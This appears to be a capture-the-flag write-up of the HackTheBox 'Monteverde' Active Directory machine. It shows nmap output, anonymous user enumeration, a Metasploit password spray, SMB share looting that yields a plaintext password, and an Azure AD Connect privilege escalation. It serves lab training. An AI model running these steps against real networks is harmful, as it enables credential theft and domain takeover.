HackTheBox — Monteverde

Summary

Today we have windows machine that provides Active Directory Services with IP 10.10.10.72

Let’s get start!

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.172
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 00:51 EET
Nmap scan report for 10.10.10.172
Host is up (0.13s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 22:07:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/18%Time=5EEA9EAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -44m49s, deviation: 0s, median: -44m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-18 00:09:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 297.02 seconds
root@strike:~#

We found several ports are opened: 135(RPC), 139(Netbios), 389(Ldap) and more

Let’s exploit SMB protocol

root@strike:~# rpcclient -U "" -N 10.10.10.172
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>

I dumped all users in users.txt file

Exploitation

Let’s take a look with smb_login module in Metasploit to get the correct user

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK.LOCAL
SMBDomain => MEGABANK.LOCAL
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/Desktop/users.txt
USER_FILE => /root/Desktop/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\Guest:Guest',
[!] 10.10.10.172:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\roleary:roleary',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\smorgan:smorgan',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK.LOCAL\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >

We found SABatchJobs user, Let’s gain access on SABatchJobs

root@strike:~# smbclient -U 'SABatchJobs' //10.10.10.172/users$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 15:12:48 2020
.. D 0 Fri Jan 3 15:12:48 2020
dgalanos D 0 Fri Jan 3 15:12:30 2020
mhope D 0 Fri Jan 3 15:41:18 2020
roleary D 0 Fri Jan 3 15:10:30 2020
smorgan D 0 Fri Jan 3 15:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 15:41:18 2020
.. D 0 Fri Jan 3 15:41:18 2020
azure.xml AR 1212 Fri Jan 3 15:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)
smb: \mhope\>

I found interest file, So i download it and tried to take a look

Now i have credentials to gain shell from this user username mhope and password 4n0therD4y@n0th3r$

Gain user flag!

Privilege Escalation

The current user has group permission of MEGABANK\Azure Admins

*Evil-WinRM* PS C:\Users\mhope\Desktop> net users mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 6/17/2020 3:58:24 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop>

Azure AD Connect is the Microsoft tool designed to meet and accomplish your hybrid identity goals

Ref: Azure-ADConnect.ps1

Now we need to upload Azure-ADConnect.ps1 file to machine
Launch simple python server

Now upload

Now let’s try to connect with administrator credentials

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student